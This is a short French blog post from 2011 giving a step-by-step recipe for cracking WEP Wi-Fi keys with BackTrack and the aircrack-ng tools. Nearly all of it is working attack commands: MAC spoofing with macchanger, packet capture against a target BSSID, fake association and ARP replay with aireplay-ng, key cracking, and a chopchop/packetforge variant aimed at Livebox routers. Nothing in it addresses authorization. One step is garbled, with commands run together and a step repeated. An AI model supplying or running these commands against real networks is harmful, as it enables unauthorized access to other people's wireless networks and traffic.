vendredi 27 mai 2011

Craquer un réseau Wifi


Voici une méthode que j'avais mis dans un coin depuis très longtemps et qui m'avait bien servi. Il s'agit ici de craquer une clé WEP. J'utilise un Mac, donc via VMWare, j'installe BackTrack3. Puis je branche une clé USB Wifi.
  1. Lancer VMWare
  2. Lancer BackTrack3
  3. Brancher Dongle Wifi
  4. Charger la clé USB et changer sa MAC
    wget http://rt2x00.serialmonkey.com/rt73-cvs-daily.tar.gz
    tar -xvzf rt73-cvs-daily.tar.gz
    cd rt73-cvs-2008062011/Module
    make
    make install
    airdriver-ng reload 31< ifconfig wlan0 down macchanger --mac=00:01:02:03:04:05 wlan0 airmon-ng start wlan0 Scanner le réseau et enregistrer
    airodump-ng --encrypt WEP wlan0
    airodump-ng --write maison --channel 10 --bssid 66:65:47:58:38:CC wlan0
  5. Scanner le réseau et enregistrer
    airodump-ng --encrypt WEP wlan0
    airodump-ng --write maison --channel 10 --bssid 66:65:47:58:38:CC wlan0
  6. S'associer au réseau
    aireplay-ng -1 0 -a 66:65:47:58:38:CC -h 00:01:02:03:04:05 wlan0
  7. Lire les beacons
    aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b 66:65:47:58:38:CC -h 00:01:02:03:04:05 wlan0
  8. Cracker la clé
    aircrack-ng -x grimaldi-1.cap
  9. Configuration de la cle wifi:
    iwconfig wlan0 mode managed key <cle WEP>
    dhcpd wlan0
  10. Methode Chopchop pour Livebox avec station
  11. Pas d'association
    1. # aireplay-ng --chopchop -F -b <bssid> -h <station> wlan0
    2. # packetforge-ng -0 -a <bssid> -h <station> -k 10.255.255.255 -l 192.168.0.1 -y replay.xor -w arprequest
    3. aireplay-ng -2 -F -r arprequest -h <station> wlan0
    4. # aircrack-ng -P2 maison.cap